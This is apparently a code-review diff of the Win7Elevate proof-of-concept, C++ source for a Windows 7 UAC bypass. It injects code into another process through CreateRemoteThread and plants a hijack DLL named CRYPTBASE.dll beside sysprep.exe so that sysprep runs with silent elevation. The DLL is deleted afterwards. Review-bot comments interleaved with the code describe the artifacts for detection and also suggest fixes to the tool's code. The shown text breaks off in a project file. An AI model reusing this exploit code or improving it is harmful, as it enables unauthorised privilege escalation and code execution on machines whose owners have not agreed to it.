// Another standard call to IFileOperation, this time to delete our dummy DLL. We clean up our mess.
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDllFull, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDelete)))
if (0 != pSHIDelete)
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
{
pFileOp->PerformOperations();
}
}
if (pSHIDelete) { pSHIDelete->Release(); }
if (pSHIDestination) { pSHIDestination->Release(); }
if (pSHISource) { pSHISource->Release(); }
if (pFileOp) { pFileOp->Release(); }
}
tfpCoUninitialize.f();
}
}
}
if (hModuleShell32) { pArgs->fpFreeLibrary(hModuleShell32); }
if (hModuleOle32) { pArgs->fpFreeLibrary(hModuleOle32); }
return 0;
}
// Marks the end of the function so we know how much data to copy.
volatile static void DummyRemoteCodeFuncEnd()
{
}
void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
const wchar_t *szPathToOurDll,
DWORD (__stdcall *Redirector)(void))
{
bool bThreadWaitSuccess = false;
bool bThreadWaitFailure = false;
HANDLE hTargetProc = NULL;
const BYTE * codeStartAdr = reinterpret_cast< const BYTE * >( &RemoteCodeFunc );
const BYTE * codeEndAdr = reinterpret_cast< const BYTE * >( &DummyRemoteCodeFuncEnd );
if (codeStartAdr >= codeEndAdr)
{
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Unexpected function layout");
return;
}
wchar_t szPathToSelf[MAX_PATH];
DWORD dwGMFNRes = GetModuleFileName(NULL, szPathToSelf, _countof(szPathToSelf));
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
{
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't get path to self");
return;
}
wchar_t szProgramFiles[MAX_PATH];
HRESULT hr = SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, szProgramFiles);
if (S_OK != hr)
{
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"SHGetFolderPath failed");
return;
}
HMODULE hModKernel32 = LoadLibrary(L"kernel32.dll");
if (hModKernel32 == 0)
{
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't load kernel32.dll");
return;
}
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HMODULE) > tfpFreeLibrary( &GetProcAddress, hModKernel32, "FreeLibrary");
W7EUtils::GetProcAddr< HMODULE (WINAPI *)(LPCWSTR) > tfpLoadLibrary( &GetProcAddress, hModKernel32, "LoadLibraryW");
W7EUtils::GetProcAddr< FARPROC (WINAPI *)(HMODULE, LPCSTR) > tfpGetProcAddress( &GetProcAddress, hModKernel32, "GetProcAddress");
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HANDLE) > tfpCloseHandle( &GetProcAddress, hModKernel32, "CloseHandle");
W7EUtils::GetProcAddr< DWORD (WINAPI *)(HANDLE,DWORD) > tfpWaitForSingleObject( &GetProcAddress, hModKernel32, "WaitForSingleObject");
if (0 == tfpFreeLibrary.f
|| 0 == tfpLoadLibrary.f
|| 0 == tfpGetProcAddress.f
|| 0 == tfpCloseHandle.f
|| 0 == tfpWaitForSingleObject.f)
{
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Couldn't find API");
}
else
{
// Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't
// directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list.
// If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one.
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
const wchar_t *szElevDll = L"CRYPTBASE.dll";
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
std::wstring strElevArgs = L"\"";
// strElevArgs += szElevExeFull;
// strElevArgs += L"\" \"";
strElevArgs += szCmd;
strElevArgs += L"\" \"";
strElevArgs += szDir;
strElevArgs += L"\" \"";
for (const wchar_t *pCmdArgChar = szArgs; *szArgs; ++szArgs)
{
if (*szArgs != L'\"')
{
strElevArgs += *szArgs;
}
else
{
strElevArgs += L"\"\"\""; // Turn each quote into three to preserve them in the arguments.
}
}
strElevArgs += L"\"";
if (!bInject)
{
// Test code without remoting.
// This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin.
// Satisfy CreateProcess's non-const args requirement
wchar_t *szElevArgsNonConst = new wchar_t[strElevArgs.length() + 1];
wcscpy_s(szElevArgsNonConst, strElevArgs.length() + 1, strElevArgs.c_str());
InjectArgs ia;
ia.fpFreeLibrary = tfpFreeLibrary.f;
ia.fpLoadLibrary = tfpLoadLibrary.f;
ia.fpGetProcAddress = tfpGetProcAddress.f;
ia.fpCloseHandle = tfpCloseHandle.f;
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
ia.szSourceDll = szPathToOurDll;
ia.szElevDir = szElevDir;
ia.szElevDll = szElevDll;
ia.szElevDllFull = szElevDllFull;
ia.szElevExeFull = szElevExeFull;
ia.szElevArgs = szElevArgsNonConst;
ia.szShell32 = L"shell32.dll";
ia.szOle32 = L"ole32.dll";
ia.szCoInitialize = "CoInitialize";
ia.szCoUninitialize = "CoUninitialize";
ia.szCoGetObject = "CoGetObject";
ia.szCoCreateInstance = "CoCreateInstance";
ia.szSHCreateItemFPN = "SHCreateItemFromParsingName";
ia.szShellExecuteExW = "ShellExecuteExW";
ia.szEIFOMoniker = bElevate ? L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" : NULL;
ia.pIID_EIFOClass = bElevate ? NULL : &__uuidof(FileOperation);
ia.pIID_EIFO = &__uuidof(IFileOperation);
ia.pIID_ShellItem2 = &__uuidof(IShellItem2);
ia.pIID_Unknown = &__uuidof(IUnknown);
RemoteCodeFunc(&ia);
delete[] szElevArgsNonConst;
}
else if (W7EUtils::OpenProcessToInject(hWnd, &hTargetProc, dwPid, szProcName))
{
// Test code with remoting.
// At least as of RC1 build 7100, with the default OS settings, this will run the specified command
// with elevation but without triggering a UAC prompt.
// Scope CRemoteMemory so it's destroyed before the process handle is closed.
{
W7EUtils::CRemoteMemory reme(hTargetProc);
InjectArgs ia;
// ASSUMPTION: Remote process has same ASLR setting as us (i.e. ASLR = on)
// kernel32.dll is mapped to the same address range in both processes.
ia.fpFreeLibrary = tfpFreeLibrary.f;
ia.fpLoadLibrary = tfpLoadLibrary.f;
ia.fpGetProcAddress = tfpGetProcAddress.f;
ia.fpCloseHandle = tfpCloseHandle.f;
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
// It would be more efficient to allocate and copy the data in one
// block but since this is just a proof-of-concept I don't bother.
ia.szSourceDll = reme.AllocAndCopyMemory(szPathToOurDll);
ia.szElevDir = reme.AllocAndCopyMemory(szElevDir);
ia.szElevDll = reme.AllocAndCopyMemory(szElevDll);
ia.szElevDllFull = reme.AllocAndCopyMemory(szElevDllFull);
ia.szElevExeFull = reme.AllocAndCopyMemory(szElevExeFull);
ia.szElevArgs = reme.AllocAndCopyMemory(strElevArgs.c_str(), false); // Leave this page writeable for CreateProcess.
ia.szShell32 = reme.AllocAndCopyMemory(L"shell32.dll");
ia.szOle32 = reme.AllocAndCopyMemory(L"ole32.dll");
ia.szCoInitialize = reme.AllocAndCopyMemory("CoInitialize");
ia.szCoUninitialize = reme.AllocAndCopyMemory("CoUninitialize");
ia.szCoGetObject = reme.AllocAndCopyMemory("CoGetObject");
ia.szCoCreateInstance = reme.AllocAndCopyMemory("CoCreateInstance");
ia.szSHCreateItemFPN = reme.AllocAndCopyMemory("SHCreateItemFromParsingName");
ia.szShellExecuteExW = reme.AllocAndCopyMemory("ShellExecuteExW");
ia.szEIFOMoniker = bElevate ? reme.AllocAndCopyMemory(L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}") : NULL;
ia.pIID_EIFOClass = bElevate ? NULL : reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(FileOperation), sizeof(__uuidof(FileOperation)), false) );
ia.pIID_EIFO = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IFileOperation), sizeof(__uuidof(IFileOperation)), false) );
ia.pIID_ShellItem2 = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IShellItem2), sizeof(__uuidof(IShellItem2)), false) );
ia.pIID_Unknown = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IUnknown), sizeof(__uuidof(IUnknown)), false) );
void *pRemoteArgs = reme.AllocAndCopyMemory(&ia, sizeof(ia), false);
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
if (reme.AnyFailures())
{
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Remote allocation failed");
}
else
{
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
if (hRemoteThread == 0)
{
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(
CError::Format(
GetLastError(),
L"Couldn't create remote thread",
L"CreateRemoteThread"));
}
else
{
if ( Redirector )
Redirector();
while(true)
{
DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 10000);
if (dwWaitRes == WAIT_OBJECT_0)
{
bThreadWaitSuccess = true;
break;
}
else if (dwWaitRes != WAIT_TIMEOUT)
{
bThreadWaitFailure = true;
break;
}
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
else
{
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
// See if it completed before the user asked to stop waiting.
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
{
bThreadWaitSuccess = true;
}
break;
}
}
if (!bThreadWaitSuccess)
{
// The memory in the other process could still be in use.
// Freeing it now will almost certainly crash the other process.
// Letting it leak is the lesser of two evils...
reme.LeakMemory();
}
}
}
}
CloseHandle(hTargetProc);
}
}
FreeLibrary(hModKernel32);
if (bThreadWaitFailure)
{
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Error waiting on the remote thread to complete");
}
else if (bThreadWaitSuccess)
{
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
CLogger::LogLine(L"Remote thread completed");
}
}
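Review bot: `W7EInject::AttemptOperation` has no header comment saying what it changes on the machine, which is what someone triaging a host or writing a detection needs from this file. From the body, with `bInject` set it writes the argument block and the bytes of `RemoteCodeFunc` into the process opened by `OpenProcessToInject` and starts them with `CreateRemoteThread`. That code then copies `szPathToOurDll` to `C:\Windows\System32\sysprep\CRYPTBASE.dll` through IFileOperation, starts `sysprep.exe` from that directory, waits for it, and deletes the DLL. I would add a short block comment above the function listing those artifacts, noting that the DLL is removed afterwards (so it appears in file-creation and process-creation telemetry rather than in a later disk scan) and that remote allocations are deliberately left in place via `reme.LeakMemory()` when the wait does not succeed. Separately, `szPathToSelf` and `szProgramFiles` are filled in and never read, `pCmdArgChar` is declared in the quoting loop while the loop advances `szArgs` itself, and `hRemoteThread` is never passed to `CloseHandle`; these look like leftovers worth removing or commenting.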


@ -0,0 +1,9 @@
#pragma once
namespace W7EInject
{
void AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
const wchar_t *szPathToOurDll,
DWORD (__stdcall *Redirector)(void));
}
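Review bot: The declaration of `AttemptOperation` is all a caller sees, and it has no comment even though `bInject` and `bElevate` change what the call does. In Win7Elevate_Inject.cpp, `bInject == false` runs `RemoteCodeFunc` in the calling process (the comment there says this should produce a UAC prompt), while `bInject == true` runs it in the process identified by `dwPid`/`szProcName`. `bElevate` selects the `Elevation:Administrator!new:` moniker instead of a plain `FileOperation` instance. A doc comment stating that, and that `Redirector` may be null and is called once after the remote thread is created, would make the contract readable without opening the .cpp. It is also worth saying that `hWnd` is only forwarded to `OpenProcessToInject` in the code shown, since the MessageBox calls that used it are commented out.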


@ -0,0 +1,347 @@
#include "stdafx.h"
#include "Win7Elevate_Utils.h"
#include ".\..\CMMN.h"
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
// (Minor tidy-up 12th June 2009 for the code's public release.)
// http://www.pretentiousname.com
// leo@ox.compsoc.net
//
// Using any part of this code for malicious purposes is expressly forbidden.
//
// This proof-of-concept code is intended only to demonstrate that code-injection
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
//
// Win7Elevate_Inject.cpp is the most interesting file. Most of the rest is just boilerplate UI/util code.
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs)
{
// Note: We probably need to target a process which has the same ASLR setting as us, i.e. ON.
// Explorer.exe is our default since it has ASLR on, is always running and can do the COM silent-elevation stuff by default.
bool bResult = false;
mapProcs.clear();
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE)
{
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
}
else
{
bool bFirst = true;
PROCESSENTRY32 pe;
while(true)
{
ZeroMemory(&pe, sizeof(pe));
pe.dwSize = sizeof(pe);
BOOL bPR = FALSE;
if (bFirst)
{
bFirst = false;
bPR = Process32First(hSnapshot, &pe);
}
else
{
bPR = Process32Next(hSnapshot, &pe);
}
if (!bPR)
{
DWORD dwErr = GetLastError();
if (ERROR_NO_MORE_FILES != dwErr)
{
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First failed");
}
else if (mapProcs.empty())
{
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"Process32Next/First returned nothing");
}
else
{
bResult = true;
}
break; // Stop enumerating.
}
// Only insert processes that we can open
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);
if (hProc != 0)
{
CloseHandle(hProc);
mapProcs.insert( std::make_pair( pe.th32ProcessID, pe.szExeFile ) );
}
}
CloseHandle(hSnapshot);
}
return bResult;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName)
{
*pOutProcHandle = 0;
if (szProcName == NULL)
{
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(L"No process name passed in");
return false;
}
*pOutProcHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
if (*pOutProcHandle == 0)
{
DWORD dwError = GetLastError();
wchar_t szPID[128];
_itow_s(dwPid, szPID, _countof(szPID), 10);
wchar_t szError[128];
_itow_s(dwError, szError, _countof(szError), 10);
std::wstring strMsg = L"Couldn't open process ";
strMsg += szProcName;
strMsg += L" (pid: ";
strMsg += szPID;
strMsg += L") ";
if (dwError == ERROR_ACCESS_DENIED)
{
strMsg += L"ERROR_ACCESS_DENIED\n(We probably tried to inject into an elevated process\nwhich isn't allowed unless we're also elevated.\nPick an unelevated process.)";
}
else
{
strMsg += L"error ";
strMsg += szError;
}
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
CLogger::LogLine(strMsg);
return false;
}
return true;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
W7EUtils::CTempResource::CTempResource(HINSTANCE hInstance, int iResourceId)
: m_hInstance(hInstance)
, m_iResourceId(iResourceId)
{
}
// virtual
W7EUtils::CTempResource::~CTempResource()
{
if (!m_strFilePath.empty())
{
DeleteFile(m_strFilePath.c_str());
m_strFilePath.clear();
}
m_iResourceId = 0;
}
bool W7EUtils::CTempResource::GetFilePath(std::wstring &strPath)
{
if (m_strFilePath.empty())
{
wchar_t szTempPath[MAX_PATH];
DWORD dwTemp = GetTempPath(_countof(szTempPath), szTempPath);
if (dwTemp != 0 && dwTemp < _countof(szTempPath))
{
HRSRC hResource = FindResource(m_hInstance, MAKEINTRESOURCE(m_iResourceId), L"BINARY");
if (hResource)
{
HGLOBAL hLoadedResource = LoadResource(m_hInstance, hResource);
if (hLoadedResource)
{
LPVOID pLockedResource = LockResource(hLoadedResource);
if (pLockedResource)
{
DWORD dwResourceSize = SizeofResource(m_hInstance, hResource);
if (0 != dwResourceSize)
{
wchar_t szTempFilePath[MAX_PATH];
if (0 != GetTempFileName(szTempPath, L"w7e", 0, szTempFilePath))
{
HANDLE hFile = CreateFile(szTempFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (INVALID_HANDLE_VALUE != hFile)
{
DWORD dwBytesWritten = 0;
if (WriteFile(hFile, pLockedResource, dwResourceSize, &dwBytesWritten, NULL)
&& dwBytesWritten == dwResourceSize)
{
m_strFilePath = szTempFilePath;
}
CloseHandle(hFile);
if (m_strFilePath.empty())
{
DeleteFile(szTempFilePath);
}
}
}
}
}
}
}
}
}
if (!m_strFilePath.empty())
{
strPath = m_strFilePath;
return true;
}
strPath.clear();
return false;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
W7EUtils::CRemoteMemory::CRemoteMemory(HANDLE hRemoteProcess)
: m_hRemoteProcess(hRemoteProcess)
, m_bAnyFailures(false)
{
}
// virtual
W7EUtils::CRemoteMemory::~CRemoteMemory()
{
while(!m_listRemoteAllocations.empty())
{
VirtualFreeEx(m_hRemoteProcess, m_listRemoteAllocations.back(), 0, MEM_RELEASE);
m_listRemoteAllocations.pop_back();
}
}
void W7EUtils::CRemoteMemory::LeakMemory()
{
m_listRemoteAllocations.clear();
}
bool W7EUtils::CRemoteMemory::AnyFailures() const
{
return m_bAnyFailures;
}
void *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst)
{
void *pRemoteAllocation = VirtualAllocEx(m_hRemoteProcess, 0, bufferSize, MEM_COMMIT | PAGE_READWRITE, bExecutable ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE);
if (pRemoteAllocation)
{
DWORD dwOldProtect = 0;
if (!WriteProcessMemory(m_hRemoteProcess, pRemoteAllocation, pLocalBuffer, bufferSize, NULL)
|| (!bExecutable && !bConst && !VirtualProtectEx(m_hRemoteProcess, pRemoteAllocation, bufferSize, bExecutable ? PAGE_EXECUTE_READ : PAGE_READONLY, &dwOldProtect)))
{
VirtualFreeEx(m_hRemoteProcess, pRemoteAllocation, 0, MEM_RELEASE);
pRemoteAllocation = 0;
}
else
{
m_listRemoteAllocations.push_back(pRemoteAllocation);
}
}
if (pRemoteAllocation == 0)
{
m_bAnyFailures = true;
}
return pRemoteAllocation;
}
wchar_t *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst)
{
return reinterpret_cast< wchar_t * >(
this->AllocAndCopyMemory(
reinterpret_cast< const void * >( szLocalString ),
(wcslen(szLocalString)+1) * sizeof(szLocalString[0]),
false, bConst ) );
}
char *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const char *szLocalString, bool bConst)
{
return reinterpret_cast< char * >(
this->AllocAndCopyMemory(
reinterpret_cast< const void * >( szLocalString ),
(strlen(szLocalString)+1) * sizeof(szLocalString[0]),
false, bConst ) );
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// GetElevationType slightly modified from original by Andrei Belogortseff
// From http://stackoverflow.com/questions/95912/how-can-i-detect-if-my-process-is-running-uac-elevated-or-not
bool W7EUtils::GetElevationType(TOKEN_ELEVATION_TYPE * ptet)
{
bool bResult = false;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
{
DWORD dwReturnLength = 0;
if (GetTokenInformation(hToken, TokenElevationType, ptet, sizeof(*ptet), &dwReturnLength ))
{
assert(dwReturnLength == sizeof(*ptet));
bResult = true;
}
CloseHandle(hToken);
}
return bResult;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
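Review bot: In `OpenProcessToInject` the failure path formats two `DWORD` values with `_itow_s`, which takes a signed `int`, so a PID or error code above 0x7FFFFFFF reaches the log as a negative number. The unsigned variant keeps the log accurate: `_ultow_s(dwPid, szPID, _countof(szPID), 10);` and `_ultow_s(dwError, szError, _countof(szError), 10);`. The `hWnd` parameter of this function and of `GetProcessList` is no longer read now that every `MessageBox` call is commented out, which deserves a one-line comment at each definition, for example `// hWnd is unused since the MessageBox calls were replaced by CLogger.`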


@ -0,0 +1,54 @@
#pragma once
namespace W7EUtils
{
bool GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs);
bool OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName);
bool GetElevationType(TOKEN_ELEVATION_TYPE * ptet);
template < typename T > class GetProcAddr
{
public:
T f;
__forceinline GetProcAddr(FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName), HMODULE hModule, const char *lpProcName)
{
f = reinterpret_cast< T >(fpGetProcAddress(hModule, lpProcName));
}
};
class CTempResource
{
private:
HINSTANCE m_hInstance;
int m_iResourceId;
std::wstring m_strFilePath;
public:
CTempResource(HINSTANCE hInstance, int iResourceId);
virtual ~CTempResource();
bool GetFilePath(std::wstring &strPath);
};
class CRemoteMemory
{
private:
HANDLE m_hRemoteProcess;
std::list< void * > m_listRemoteAllocations;
bool m_bAnyFailures;
private:
CRemoteMemory(const CRemoteMemory &rhs); // Disallow.
CRemoteMemory &operator=(const CRemoteMemory &rhs); // Disallow.
public:
CRemoteMemory(HANDLE hRemoteProcess);
virtual ~CRemoteMemory();
void LeakMemory();
bool AnyFailures() const;
void *AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst = true);
wchar_t *AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst = true);
char *AllocAndCopyMemory(const char *szLocalString, bool bConst = true);
};
}
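Review bot: `CTempResource` deletes the file named by `m_strFilePath` in its destructor (the definition appears earlier on this page), but unlike `CRemoteMemory` directly below it, the class leaves the copy constructor and copy assignment implicitly available. A copy would carry the same path, and whichever object is destroyed first would delete the file while the other still returns that path from `GetFilePath`. Declaring the same private, unimplemented pair used for `CRemoteMemory` closes this: `CTempResource(const CTempResource &rhs); // Disallow.` and `CTempResource &operator=(const CTempResource &rhs); // Disallow.`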


@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// Win7Elevate.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file


@ -0,0 +1,44 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#if defined _M_IX86
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
#elif defined _M_X64
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
#endif
#include <windows.h>
#include <commctrl.h>
#include <shlobj.h>
#include <Tlhelp32.h>
#include <stdlib.h>
#include <tchar.h>
#include <assert.h>
#include <string>
#include <list>
#include <map>
#ifndef FOFX_REQUIREELEVATION
#define FOFX_REQUIREELEVATION (0x10000000)
#endif
#ifndef FOFX_DONTDISPLAYLOCATIONS
#define FOFX_DONTDISPLAYLOCATIONS (0x80000000)
#endif


@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>


@ -0,0 +1,6 @@
// Win7ElevateDll.cpp : Defines the exported functions for the DLL application.
//
#include "stdafx.h"


@ -0,0 +1,179 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{A1814C92-4DA6-440C-811E-86016AB7433A}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Win7ElevateDll</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
